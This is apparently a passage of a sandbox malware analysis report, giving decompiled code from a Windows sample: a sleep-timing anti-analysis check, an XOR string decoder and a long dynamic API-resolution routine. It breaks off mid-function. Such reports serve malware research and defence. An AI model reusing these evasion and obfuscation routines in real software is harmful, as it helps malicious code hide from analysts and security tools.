Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 84f9db92fad3da76f05b9e0e3be3efdf369b695c41f802971e80cd0f33aa4693
Instruction ID: 037935987c21b56ac9d2f6c82646566d18e4d0dbb1ca3967d9f30a297ca29eed
Opcode Fuzzy Hash: 84f9db92fad3da76f05b9e0e3be3efdf369b695c41f802971e80cd0f33aa4693
Instruction Fuzzy Hash: CDE012B4A05208BBE700DFE49A49ADD7BBCAB04301F104565E945E2280E6759E94D756

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA0, Relevance: 4.5, APIs: 3, Instructions: 19
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406AA0() {
				long _v8;
				intOrPtr _v12;

				_v8 = GetTickCount();
				Sleep(0x2710); // executed
				_v12 = GetTickCount() - _v8;
				if(_v12 <= 0x1770) {
					return 0;
				}
				return 1;
			}

0x00406aac
0x00406ab4
0x00406ac3
0x00406acd
0x00000000
0x00406ad8
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00406AA6
Sleep.KERNELBASE(00002710,?,00406B84), ref: 00406AB4
GetTickCount.KERNEL32 ref: 00406ABA

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: 7f553c1e48c696f60989e1e45f98f64c256f88cb05cd9abfc45eb1fdc696742f
Instruction ID: 5e65db4bb8db0037cc9712db6db32af1b7f49a6c19175b0f31c2b6dd27f19f6d
Opcode Fuzzy Hash: 7f553c1e48c696f60989e1e45f98f64c256f88cb05cd9abfc45eb1fdc696742f
Instruction Fuzzy Hash: F8E04F30949118DBCB00BFB4D9080AD7BB0EB01342F10C0B29807A2280DA784D609F5B

Uniqueness

Uniqueness Score: -1.00%

Function 004048D0, Relevance: 3.1, APIs: 2, Instructions: 52
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004048D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				signed int _v16;
				void* _t28;
				signed int _t33;
				void* _t53;

				_t28 = LocalAlloc(0x40, _a12 + 1); // executed
				_v12 = _t28;
				 *((char*)(_v12 + _a12)) = 0;
				_v16 = 0;
				while(_v16 < _a12) {
					_t33 = E0040B740(_a4 + _v16, _a8);
					_t53 = _t53 + 4;
					 *((char*)(_v12 + _v16)) =  *(_a4 + _v16) ^  *(_a8 + _v16 % _t33);
					_v16 = _v16 + 1;
				}
				_v8 = 0;
				VirtualProtect(_v12, 4, 0x100,  &_v8); // executed
				return _v12;
			}

0x004048e0
0x004048e6
0x004048ef
0x004048f2
0x00404904
0x00404919
0x0040491e
0x00404939
0x00404901
0x00404901
0x0040493d
0x00404953
0x00404960

APIs

LocalAlloc.KERNELBASE(00000040,?), ref: 004048E0
VirtualProtect.KERNELBASE(?,00000004,00000100,00000000), ref: 00404953

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: AllocLocalProtectVirtual
String ID:
API String ID: 4134893223-0
Opcode ID: 90b564fceca7221074c59603a80da56f6d10dbde48e6bfe9d302259930e3f4f3
Instruction ID: 4623e7d36af2260dceec399572c1bb905ae2e9b6f15e47edd37a55d804c2928b
Opcode Fuzzy Hash: 90b564fceca7221074c59603a80da56f6d10dbde48e6bfe9d302259930e3f4f3
Instruction Fuzzy Hash: 561173B4E00248EFCB04DFA8C890BAEBBB5FF49305F108099EA15A7341C735AA11CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4A0, Relevance: 268.6, APIs: 144, Strings: 9, Instructions: 865
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040C4A0() {
				CHAR* _t2;
				struct HINSTANCE__* _t3;
				CHAR* _t6;
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				CHAR* _t10;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				CHAR* _t18;
				_Unknown_base(*)()* _t19;
				struct HINSTANCE__* _t20;
				CHAR* _t23;
				struct HINSTANCE__* _t25;
				CHAR* _t28;
				struct HINSTANCE__* _t30;
				CHAR* _t33;
				CHAR* _t34;
				struct HINSTANCE__* _t36;
				CHAR* _t37;
				struct HINSTANCE__* _t39;
				CHAR* _t41;
				struct HINSTANCE__* _t43;
				CHAR* _t46;
				struct HINSTANCE__* _t48;
				CHAR* _t50;
				struct HINSTANCE__* _t52;
				CHAR* _t55;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t59;
				CHAR* _t60;
				struct HINSTANCE__* _t61;
				CHAR* _t64;
				struct HINSTANCE__* _t66;
				CHAR* _t69;
				struct HINSTANCE__* _t71;
				CHAR* _t74;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				struct HINSTANCE__* _t81;
				CHAR* _t83;
				struct HINSTANCE__* _t85;
				CHAR* _t88;
				struct HINSTANCE__* _t90;
				struct HINSTANCE__* _t92;
				CHAR* _t95;
				struct HINSTANCE__* _t97;
				CHAR* _t100;
				struct HINSTANCE__* _t102;
				CHAR* _t105;
				struct HINSTANCE__* _t107;
				CHAR* _t110;
				struct HINSTANCE__* _t112;
				CHAR* _t115;
				struct HINSTANCE__* _t117;
				CHAR* _t120;
				struct HINSTANCE__* _t122;
				CHAR* _t124;
				struct HINSTANCE__* _t127;
				CHAR* _t128;
				struct HINSTANCE__* _t130;
				CHAR* _t133;
				struct HINSTANCE__* _t135;
				CHAR* _t138;
				struct HINSTANCE__* _t140;
				CHAR* _t143;
				struct HINSTANCE__* _t145;
				CHAR* _t148;
				struct HINSTANCE__* _t150;
				CHAR* _t153;
				struct HINSTANCE__* _t155;
				CHAR* _t158;
				struct HINSTANCE__* _t160;
				CHAR* _t163;
				struct HINSTANCE__* _t165;
				CHAR* _t168;
				struct HINSTANCE__* _t170;
				CHAR* _t173;
				struct HINSTANCE__* _t175;
				CHAR* _t178;
				struct HINSTANCE__* _t180;
				CHAR* _t183;
				struct HINSTANCE__* _t185;
				CHAR* _t188;
				struct HINSTANCE__* _t190;
				CHAR* _t193;
				struct HINSTANCE__* _t195;
				CHAR* _t198;
				struct HINSTANCE__* _t200;
				CHAR* _t203;
				struct HINSTANCE__* _t205;
				CHAR* _t208;
				struct HINSTANCE__* _t210;
				struct HINSTANCE__* _t213;
				struct HINSTANCE__* _t217;
				CHAR* _t220;
				CHAR* _t221;
				CHAR* _t222;
				CHAR* _t223;
				struct HINSTANCE__* _t224;
				CHAR* _t225;
				CHAR* _t226;
				struct HINSTANCE__* _t227;
				CHAR* _t228;
				struct HINSTANCE__* _t229;
				CHAR* _t230;
				struct HINSTANCE__* _t231;
				struct HINSTANCE__* _t232;
				struct HINSTANCE__* _t233;
				CHAR* _t234;
				struct HINSTANCE__* _t235;
				CHAR* _t236;
				struct HINSTANCE__* _t237;
				CHAR* _t238;
				struct HINSTANCE__* _t239;
				CHAR* _t240;
				struct HINSTANCE__* _t241;
				CHAR* _t242;
				CHAR* _t243;
				struct HINSTANCE__* _t244;
				CHAR* _t245;
				struct HINSTANCE__* _t246;
				CHAR* _t247;
				struct HINSTANCE__* _t248;
				CHAR* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t251;
				struct HINSTANCE__* _t252;
				CHAR* _t253;
				struct HINSTANCE__* _t254;
				CHAR* _t255;
				struct HINSTANCE__* _t256;
				struct HINSTANCE__* _t257;
				CHAR* _t258;
				struct HINSTANCE__* _t259;
				CHAR* _t260;
				struct HINSTANCE__* _t261;
				CHAR* _t262;
				struct HINSTANCE__* _t263;
				CHAR* _t264;
				CHAR* _t265;
				struct HINSTANCE__* _t266;
				CHAR* _t267;
				struct HINSTANCE__* _t268;
				CHAR* _t269;
				struct HINSTANCE__* _t270;
				struct HINSTANCE__* _t271;
				struct HINSTANCE__* _t272;
				struct HINSTANCE__* _t273;
				CHAR* _t274;
				struct HINSTANCE__* _t275;
				CHAR* _t276;
				struct HINSTANCE__* _t277;
				CHAR* _t278;
				struct HINSTANCE__* _t279;
				CHAR* _t280;
				struct HINSTANCE__* _t281;
				CHAR* _t282;
				struct HINSTANCE__* _t283;
				CHAR* _t284;
				struct HINSTANCE__* _t285;
				CHAR* _t286;
				struct HINSTANCE__* _t287;
				CHAR* _t288;
				struct HINSTANCE__* _t289;
				CHAR* _t290;
				struct HINSTANCE__* _t291;
				CHAR* _t292;
				struct HINSTANCE__* _t293;
				CHAR* _t294;
				struct HINSTANCE__* _t295;
				CHAR* _t296;
				struct HINSTANCE__* _t297;
				CHAR* _t298;
				struct HINSTANCE__* _t299;
				CHAR* _t300;
				struct HINSTANCE__* _t301;
				CHAR* _t302;
				struct HINSTANCE__* _t303;
				CHAR* _t304;
				struct HINSTANCE__* _t305;
				CHAR* _t306;
				struct HINSTANCE__* _t307;
				struct HINSTANCE__* _t308;
				CHAR* _t309;
				CHAR* _t310;
				CHAR* _t311;
				CHAR* _t312;
				CHAR* _t313;
				CHAR* _t314;
				struct HINSTANCE__* _t315;
				struct HINSTANCE__* _t316;
				CHAR* _t317;
				struct HINSTANCE__* _t318;
				CHAR* _t319;
				struct HINSTANCE__* _t320;
				CHAR* _t321;
				CHAR* _t322;
				struct HINSTANCE__* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				CHAR* _t326;
				struct HINSTANCE__* _t327;
				CHAR* _t328;
				struct HINSTANCE__* _t329;
				CHAR* _t330;
				struct HINSTANCE__* _t331;
				struct HINSTANCE__* _t332;
				CHAR* _t333;
				CHAR* _t334;
				struct HINSTANCE__* _t335;
				CHAR* _t336;
				struct HINSTANCE__* _t337;
				CHAR* _t338;
				struct HINSTANCE__* _t339;
				CHAR* _t340;
				struct HINSTANCE__* _t341;
				CHAR* _t342;
				struct HINSTANCE__* _t343;
				CHAR* _t344;
				struct HINSTANCE__* _t345;
				CHAR* _t346;
				CHAR* _t347;
				struct HINSTANCE__* _t348;
				CHAR* _t349;
				struct HINSTANCE__* _t350;
				CHAR* _t351;
				struct HINSTANCE__* _t352;
				CHAR* _t353;
				struct HINSTANCE__* _t354;
				struct HINSTANCE__* _t355;
				CHAR* _t356;
				struct HINSTANCE__* _t357;
				CHAR* _t358;
				struct HINSTANCE__* _t359;
				CHAR* _t360;
				struct HINSTANCE__* _t361;
				CHAR* _t362;
				struct HINSTANCE__* _t363;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				struct HINSTANCE__* _t367;
				CHAR* _t368;
				struct HINSTANCE__* _t369;
				CHAR* _t370;
				struct HINSTANCE__* _t371;
				CHAR* _t372;
				struct HINSTANCE__* _t373;
				CHAR* _t374;
				struct HINSTANCE__* _t375;
				CHAR* _t376;
				struct HINSTANCE__* _t377;
				CHAR* _t378;
				struct HINSTANCE__* _t379;
				CHAR* _t380;
				struct HINSTANCE__* _t381;
				CHAR* _t382;
				struct HINSTANCE__* _t383;
				CHAR* _t384;
				struct HINSTANCE__* _t385;
				CHAR* _t386;
				struct HINSTANCE__* _t387;
				CHAR* _t388;
				struct HINSTANCE__* _t389;
				CHAR* _t390;
				struct HINSTANCE__* _t391;
				CHAR* _t392;
				struct HINSTANCE__* _t393;
				CHAR* _t394;
				struct HINSTANCE__* _t395;
				struct HINSTANCE__* _t396;

				if( *0x41aa64 != 0) {
					_t128 =  *0x41a0b4; // 0x2e4a0d8
					_t273 =  *0x41aa64; // 0x74df0000
					 *0x41a9b4 = GetProcAddress(_t273, _t128);
					_t362 =  *0x41a728; // 0x2e49fd0
					_t130 =  *0x41aa64; // 0x74df0000
					 *0x41aa24 = GetProcAddress(_t130, _t362);
					_t274 =  *0x41a2bc; // 0x2e33168
					_t363 =  *0x41aa64; // 0x74df0000
					 *0x41a9bc = GetProcAddress(_t363, _t274);
					_t133 =  *0x41a668; // 0x2e49e68
					_t275 =  *0x41aa64; // 0x74df0000
					 *0x41a8b0 = GetProcAddress(_t275, _t133);
					_t364 =  *0x41a5d8; // 0x2e49f70
					_t135 =  *0x41aa64; // 0x74df0000
					 *0x41a910 = GetProcAddress(_t135, _t364);
					_t276 =  *0x41a26c; // 0x2e49ef8
					_t365 =  *0x41aa64; // 0x74df0000
					 *0x41a8b8 = GetProcAddress(_t365, _t276);
					_t138 =  *0x41a64c; // 0x2e49f10
					_t277 =  *0x41aa64; // 0x74df0000
					 *0x41aa90 = GetProcAddress(_t277, _t138);
					_t366 =  *0x41a4b8; // 0x2e49f28
					_t140 =  *0x41aa64; // 0x74df0000
					 *0x41a908 = GetProcAddress(_t140, _t366);
					_t278 =  *0x41a2b4; // 0x2e49fb8
					_t367 =  *0x41aa64; // 0x74df0000
					 *0x41aa70 = GetProcAddress(_t367, _t278);
					_t143 =  *0x41a7bc; // 0x2e4a168
					_t279 =  *0x41aa64; // 0x74df0000
					 *0x41a9d8 = GetProcAddress(_t279, _t143);
					_t368 =  *0x41a49c; // 0x2e4a198
					_t145 =  *0x41aa64; // 0x74df0000
					 *0x41aa10 = GetProcAddress(_t145, _t368);
					_t280 =  *0x41a4fc; // 0x2e4a1b0
					_t369 =  *0x41aa64; // 0x74df0000
					 *0x41a8cc = GetProcAddress(_t369, _t280);
					_t148 =  *0x41a3a8; // 0x2e4a180
					_t281 =  *0x41aa64; // 0x74df0000
					 *0x41aa9c = GetProcAddress(_t281, _t148);
					_t370 =  *0x41a1c0; // 0x2e33128
					_t150 =  *0x41aa64; // 0x74df0000
					 *0x41a998 = GetProcAddress(_t150, _t370);
					_t282 =  *0x41a1f8; // 0x2e4a1f8
					_t371 =  *0x41aa64; // 0x74df0000
					 *0x41a9a0 = GetProcAddress(_t371, _t282);
					_t153 =  *0x41a7ac; // 0x2e332c8
					_t283 =  *0x41aa64; // 0x74df0000
					 *0x41aaac = GetProcAddress(_t283, _t153);
					_t372 =  *0x41a5f8; // 0x2e495e0
					_t155 =  *0x41aa64; // 0x74df0000
					 *0x41a904 = GetProcAddress(_t155, _t372);
					_t284 =  *0x41a0dc; // 0x2e4a1c8
					_t373 =  *0x41aa64; // 0x74df0000
					 *0x41aac4 = GetProcAddress(_t373, _t284);
					_t158 =  *0x41a30c; // 0x2e33288
					_t285 =  *0x41aa64; // 0x74df0000
					 *0x41a86c = GetProcAddress(_t285, _t158);
					_t374 =  *0x41a664; // 0x2e4a1e0
					_t160 =  *0x41aa64; // 0x74df0000
					 *0x41a8fc = GetProcAddress(_t160, _t374);
					_t286 =  *0x41a04c; // 0x2e33188
					_t375 =  *0x41aa64; // 0x74df0000
					 *0x41aad0 = GetProcAddress(_t375, _t286);
					_t163 =  *0x41a0f0; // 0x2e4a210
					_t287 =  *0x41aa64; // 0x74df0000
					 *0x41aa44 = GetProcAddress(_t287, _t163);
					_t376 =  *0x41a134; // 0x2e4a150
					_t165 =  *0x41aa64; // 0x74df0000
					 *0x41a974 = GetProcAddress(_t165, _t376);
					_t288 =  *0x41a460; // 0x2e4a810
					_t377 =  *0x41aa64; // 0x74df0000
					 *0x41a8e4 = GetProcAddress(_t377, _t288);
					_t168 =  *0x41a554; // 0x2e4a630
					_t289 =  *0x41aa64; // 0x74df0000
					 *0x41a868 = GetProcAddress(_t289, _t168);
					_t378 =  *0x41a190; // 0x2e32f28
					_t170 =  *0x41aa64; // 0x74df0000
					 *0x41a96c = GetProcAddress(_t170, _t378);
					_t290 =  *0x41a52c; // 0x2e4a558
					_t379 =  *0x41aa64; // 0x74df0000
					 *0x41aad8 = GetProcAddress(_t379, _t290);
					_t173 =  *0x41a5d0; // 0x2e4a6a8
					_t291 =  *0x41aa64; // 0x74df0000
					 *0x41a930 = GetProcAddress(_t291, _t173);
					_t380 =  *0x41a268; // 0x2e4a5d0
					_t175 =  *0x41aa64; // 0x74df0000
					 *0x41a8a8 = GetProcAddress(_t175, _t380);
					_t292 =  *0x41a3f8; // 0x2e33268
					_t381 =  *0x41aa64; // 0x74df0000
					 *0x41a894 = GetProcAddress(_t381, _t292);
					_t178 =  *0x41a3a4; // 0x2e4a5b8
					_t293 =  *0x41aa64; // 0x74df0000
					 *0x41a8c4 = GetProcAddress(_t293, _t178);
					_t382 =  *0x41a048; // 0x2e4a618
					_t180 =  *0x41aa64; // 0x74df0000
					 *0x41a914 = GetProcAddress(_t180, _t382);
					_t294 =  *0x41a6b0; // 0x2e4a840
					_t383 =  *0x41aa64; // 0x74df0000
					 *0x41a8b4 = GetProcAddress(_t383, _t294);
					_t183 =  *0x41a458; // 0x2e4a708
					_t295 =  *0x41aa64; // 0x74df0000
					 *0x41a9dc = GetProcAddress(_t295, _t183);
					_t384 =  *0x41a364; // 0x2e4a720
					_t185 =  *0x41aa64; // 0x74df0000
					 *0x41aad4 = GetProcAddress(_t185, _t384);
					_t296 =  *0x41a550; // 0x2e335e8
					_t385 =  *0x41aa64; // 0x74df0000
					 *0x41a8a4 = GetProcAddress(_t385, _t296);
					_t188 =  *0x41a13c; // 0x2e334a8
					_t297 =  *0x41aa64; // 0x74df0000
					 *0x41a8a0 = GetProcAddress(_t297, _t188);
					_t386 =  *0x41a428; // 0x2e4a660
					_t190 =  *0x41aa64; // 0x74df0000
					 *0x41aa20 = GetProcAddress(_t190, _t386);
					_t298 =  *0x41a420; // 0x2e4a690
					_t387 =  *0x41aa64; // 0x74df0000
					 *0x41a9d4 = GetProcAddress(_t387, _t298);
					_t193 =  *0x41a02c; // 0x2e336c8
					_t299 =  *0x41aa64; // 0x74df0000
					 *0x41aab0 = GetProcAddress(_t299, _t193);
					_t388 =  *0x41a184; // 0x2e49540
					_t195 =  *0x41aa64; // 0x74df0000
					 *0x41a9a4 = GetProcAddress(_t195, _t388);
					_t300 =  *0x41a118; // 0x2e4a738
					_t389 =  *0x41aa64; // 0x74df0000
					 *0x41a8c8 = GetProcAddress(_t389, _t300);
					_t198 =  *0x41a1a4; // 0x2e4a6c0
					_t301 =  *0x41aa64; // 0x74df0000
					 *0x41a860 = GetProcAddress(_t301, _t198);
					_t390 =  *0x41a400; // 0x2e335a8
					_t200 =  *0x41aa64; // 0x74df0000
					 *0x41a9b0 = GetProcAddress(_t200, _t390);
					_t302 =  *0x41a654; // 0x2e33428
					_t391 =  *0x41aa64; // 0x74df0000
					 *0x41a8f4 = GetProcAddress(_t391, _t302);
					_t203 =  *0x41a3dc; // 0x2e33488
					_t303 =  *0x41aa64; // 0x74df0000
					 *0x41a850 = GetProcAddress(_t303, _t203);
					_t392 =  *0x41a2dc; // 0x2e4a7e0
					_t205 =  *0x41aa64; // 0x74df0000
					 *0x41a858 = GetProcAddress(_t205, _t392);
					_t304 =  *0x41a5f4; // 0x2e334c8
					_t393 =  *0x41aa64; // 0x74df0000
					 *0x41a92c = GetProcAddress(_t393, _t304);
					_t208 =  *0x41a780; // 0x2e4a6d8
					_t305 =  *0x41aa64; // 0x74df0000
					 *0x41a978 = GetProcAddress(_t305, _t208);
					_t394 =  *0x41a0d8; // 0x2e33388
					_t210 =  *0x41aa64; // 0x74df0000
					 *0x41aa1c = GetProcAddress(_t210, _t394);
					_t306 =  *0x41a6ac; // 0x2e33688
					_t395 =  *0x41aa64; // 0x74df0000
					 *0x41a890 = GetProcAddress(_t395, _t306);
					_t213 =  *0x41aa64; // 0x74df0000
					 *0x41aa58 = GetProcAddress(_t213, "CreateThread");
					_t307 =  *0x41aa64; // 0x74df0000
					 *0x41a8e8 = GetProcAddress(_t307, "GetEnvironmentVariableA");
					_t396 =  *0x41aa64; // 0x74df0000
					 *0x41a8ac = GetProcAddress(_t396, "SetEnvironmentVariableA");
					_t217 =  *0x41aa64; // 0x74df0000
					 *0x41aac8 = GetProcAddress(_t217, "lstrcpyA");
					_t308 =  *0x41aa64; // 0x74df0000
					 *0x41a994 = GetProcAddress(_t308, "lstrcpynA");
				}
				_t309 =  *0x41a03c; // 0x2e4a090
				 *0x41a964 = LoadLibraryA(_t309);
				_t2 =  *0x41a1e4; // 0x2e4a108
				_t3 = LoadLibraryA(_t2); // executed
				 *0x41a8d8 = _t3;
				_t220 =  *0x41a5fc; // 0x2e4a0c0
				 *0x41aaa8 = LoadLibraryA(_t220);
				_t310 =  *0x41a2c0; // 0x2e4a048
				 *0x41a988 = LoadLibraryA(_t310);
				_t6 =  *0x41a240; // 0x2e49f88
				_t7 = LoadLibraryA(_t6); // executed
				 *0x41aa40 = _t7;
				_t221 =  *0x41a77c; // 0x2e49fe8
				_t8 = LoadLibraryA(_t221); // executed
				 *0x41a94c = _t8;
				_t311 =  *0x41a1e0; // 0x2e49fa0
				_t9 = LoadLibraryA(_t311); // executed
				 *0x41aa34 = _t9;
				_t10 =  *0x41a568; // 0x2e4a060
				_t11 = LoadLibraryA(_t10); // executed
				 *0x41aa80 = _t11;
				_t222 =  *0x41a0a4; // 0x2e4a078
				_t12 = LoadLibraryA(_t222); // executed
				 *0x41a968 = _t12;
				_t312 =  *0x41a5a0; // 0x2e4a0f0
				_t13 = LoadLibraryA(_t312); // executed
				 *0x41aa98 = _t13;
				_t14 =  *0x41a688; // 0x2e49f40
				_t15 = LoadLibraryA(_t14); // executed
				 *0x41a938 = _t15;
				_t223 =  *0x41a228; // 0x2e4a138
				_t16 = LoadLibraryA(_t223); // executed
				 *0x41a97c = _t16;
				_t313 =  *0x41a58c; // 0x2e49e50
				_t17 = LoadLibraryA(_t313); // executed
				 *0x41aa88 = _t17;
				if( *0x41a964 != 0) {
					_t124 =  *0x41a4a0; // 0x2e49b78
					_t272 =  *0x41a964; // 0x775e0000
					 *0x41aa54 = GetProcAddress(_t272, _t124);
					_t361 =  *0x41a964; // 0x775e0000
					 *0x41a85c = GetProcAddress(_t361, "memset");
					_t127 =  *0x41a964; // 0x775e0000
					_t17 = GetProcAddress(_t127, "memcpy");
					 *0x41aab8 = _t17;
				}
				if( *0x41a8d8 != 0) {
					_t265 =  *0x41a490; // 0x2e4a750
					_t355 =  *0x41a8d8; // 0x6fc40000
					 *0x41a954 = GetProcAddress(_t355, _t265);
					_t110 =  *0x41a25c; // 0x2e33448
					_t266 =  *0x41a8d8; // 0x6fc40000
					 *0x41aa74 = GetProcAddress(_t266, _t110);
					_t356 =  *0x41a530; // 0x2e334e8
					_t112 =  *0x41a8d8; // 0x6fc40000
					 *0x41aabc = GetProcAddress(_t112, _t356);
					_t267 =  *0x41a560; // 0x2e33608
					_t357 =  *0x41a8d8; // 0x6fc40000
					 *0x41aa3c = GetProcAddress(_t357, _t267);
					_t115 =  *0x41a3d4; // 0x2e4a7c8
					_t268 =  *0x41a8d8; // 0x6fc40000
					 *0x41aacc = GetProcAddress(_t268, _t115);
					_t358 =  *0x41a23c; // 0x2e336a8
					_t117 =  *0x41a8d8; // 0x6fc40000
					 *0x41a950 = GetProcAddress(_t117, _t358);
					_t269 =  *0x41a564; // 0x2e333a8
					_t359 =  *0x41a8d8; // 0x6fc40000
					 *0x41a980 = GetProcAddress(_t359, _t269);
					_t120 =  *0x41a45c; // 0x2e33328
					_t270 =  *0x41a8d8; // 0x6fc40000
					 *0x41a84c = GetProcAddress(_t270, _t120);
					_t360 =  *0x41a278; // 0x2e333c8
					_t122 =  *0x41a8d8; // 0x6fc40000
					 *0x41a958 = GetProcAddress(_t122, _t360);
					_t271 =  *0x41a8d8; // 0x6fc40000
					_t17 = GetProcAddress(_t271, "InternetCrackUrlA");
					 *0x41a8ec = _t17;
				}
				if( *0x41aaa8 != 0) {
					_t347 =  *0x41a318; // 0x2e4a5a0
					_t92 =  *0x41aaa8; // 0x768f0000
					 *0x41a874 = GetProcAddress(_t92, _t347);
					_t258 =  *0x41a63c; // 0x2e4a678
					_t348 =  *0x41aaa8; // 0x768f0000
					 *0x41a9ac = GetProcAddress(_t348, _t258);
					_t95 =  *0x41a608; // 0x2e33348
					_t259 =  *0x41aaa8; // 0x768f0000
					 *0x41a9ec = GetProcAddress(_t259, _t95);
					_t349 =  *0x41a528; // 0x2e33568
					_t97 =  *0x41aaa8; // 0x768f0000
					 *0x41a9fc = GetProcAddress(_t97, _t349);
					_t260 =  *0x41a3ec; // 0x2e4a7f8
					_t350 =  *0x41aaa8; // 0x768f0000
					 *0x41aa28 = GetProcAddress(_t350, _t260);
					_t100 =  *0x41a648; // 0x2e49ad8
					_t261 =  *0x41aaa8; // 0x768f0000
					 *0x41aaa4 = GetProcAddress(_t261, _t100);
					_t351 =  *0x41a298; // 0x2e33368
					_t102 =  *0x41aaa8; // 0x768f0000
					 *0x41aab4 = GetProcAddress(_t102, _t351);
					_t262 =  *0x41a618; // 0x2e333e8
					_t352 =  *0x41aaa8; // 0x768f0000
					 *0x41a878 = GetProcAddress(_t352, _t262);
					_t105 =  *0x41a384; // 0x2e4a588
					_t263 =  *0x41aaa8; // 0x768f0000
					 *0x41aac0 = GetProcAddress(_t263, _t105);
					_t353 =  *0x41a4ec; // 0x2e4a7b0
					_t107 =  *0x41aaa8; // 0x768f0000
					 *0x41aa5c = GetProcAddress(_t107, _t353);
					_t264 =  *0x41a38c; // 0x2e4a6f0
					_t354 =  *0x41aaa8; // 0x768f0000
					_t17 = GetProcAddress(_t354, _t264);
					 *0x41aa94 = _t17;
				}
				if( *0x41a854 != 0) {
					_t83 =  *0x41a6c8; // 0x2e4a768
					_t254 =  *0x41a854; // 0x74b40000
					 *0x41a940 = GetProcAddress(_t254, _t83);
					_t344 =  *0x41a53c; // 0x2e33408
					_t85 =  *0x41a854; // 0x74b40000
					 *0x41a920 = GetProcAddress(_t85, _t344);
					_t255 =  *0x41a180; // 0x2e4a780
					_t345 =  *0x41a854; // 0x74b40000
					 *0x41a9c4 = GetProcAddress(_t345, _t255);
					_t88 =  *0x41a724; // 0x2e33508
					_t256 =  *0x41a854; // 0x74b40000
					 *0x41a870 = GetProcAddress(_t256, _t88);
					_t346 =  *0x41a1fc; // 0x2e4a798
					_t90 =  *0x41a854; // 0x74b40000
					 *0x41aa6c = GetProcAddress(_t90, _t346);
					_t257 =  *0x41a854; // 0x74b40000
					_t17 = GetProcAddress(_t257, "RegGetValueA");
					 *0x41a8f8 = _t17;
				}
				if( *0x41a988 != 0) {
					_t334 =  *0x41a4c4; // 0x2e4a648
					_t61 =  *0x41a988; // 0x76b90000
					 *0x41a9d0 = GetProcAddress(_t61, _t334);
					_t245 =  *0x41a198; // 0x2e4a828
					_t335 =  *0x41a988; // 0x76b90000
					 *0x41a960 = GetProcAddress(_t335, _t245);
					_t64 =  *0x41a7a8; // 0x2e33628
					_t246 =  *0x41a988; // 0x76b90000
					 *0x41a948 = GetProcAddress(_t246, _t64);
					_t336 =  *0x41a274; // 0x2e33548
					_t66 =  *0x41a988; // 0x76b90000
					 *0x41a8bc = GetProcAddress(_t66, _t336);
					_t247 =  *0x41a624; // 0x2e4a570
					_t337 =  *0x41a988; // 0x76b90000
					 *0x41a898 = GetProcAddress(_t337, _t247);
					_t69 =  *0x41a2b8; // 0x2e49ba8
					_t248 =  *0x41a988; // 0x76b90000
					 *0x41a880 = GetProcAddress(_t248, _t69);
					_t338 =  *0x41a5f0; // 0x2e4a5e8
					_t71 =  *0x41a988; // 0x76b90000
					 *0x41aa38 = GetProcAddress(_t71, _t338);
					_t249 =  *0x41a19c; // 0x2e4a600
					_t339 =  *0x41a988; // 0x76b90000
					 *0x41a93c = GetProcAddress(_t339, _t249);
					_t74 =  *0x41a73c; // 0x2e4a9d8
					_t250 =  *0x41a988; // 0x76b90000
					 *0x41a9f0 = GetProcAddress(_t250, _t74);
					_t340 =  *0x41a254; // 0x2e4a918
					_t76 =  *0x41a988; // 0x76b90000
					 *0x41a918 = GetProcAddress(_t76, _t340);
					_t251 =  *0x41a404; // 0x2e49bb8
					_t341 =  *0x41a988; // 0x76b90000
					 *0x41a87c = GetProcAddress(_t341, _t251);
					_t79 =  *0x41a17c; // 0x2e33468
					_t252 =  *0x41a988; // 0x76b90000
					 *0x41a9a8 = GetProcAddress(_t252, _t79);
					_t342 =  *0x41a154; // 0x2e4a900
					_t81 =  *0x41a988; // 0x76b90000
					 *0x41a8d4 = GetProcAddress(_t81, _t342);
					_t253 =  *0x41a778; // 0x2e4a990
					_t343 =  *0x41a988; // 0x76b90000
					_t17 = GetProcAddress(_t343, _t253);
					 *0x41a9f8 = _t17;
				}
				if( *0x41aa40 != 0) {
					_t60 =  *0x41a120; // 0x2e48e70
					_t244 =  *0x41aa40; // 0x6eab0000
					_t17 = GetProcAddress(_t244, _t60); // executed
					 *0x41a864 = _t17;
				}
				if( *0x41a94c != 0) {
					_t333 =  *0x41a3a0; // 0x2e33668
					_t59 =  *0x41a94c; // 0x768e0000
					_t17 = GetProcAddress(_t59, _t333);
					 *0x41aa48 = _t17;
				}
				if( *0x41a934 != 0) {
					_t243 =  *0x41a354; // 0x2e33528
					_t332 =  *0x41a934; // 0x749a0000
					_t17 = GetProcAddress(_t332, _t243);
					 *0x41a91c = _t17;
				}
				if( *0x41aa34 != 0) {
					_t50 =  *0x41a108; // 0x2e495b8
					_t239 =  *0x41aa34; // 0x73da0000
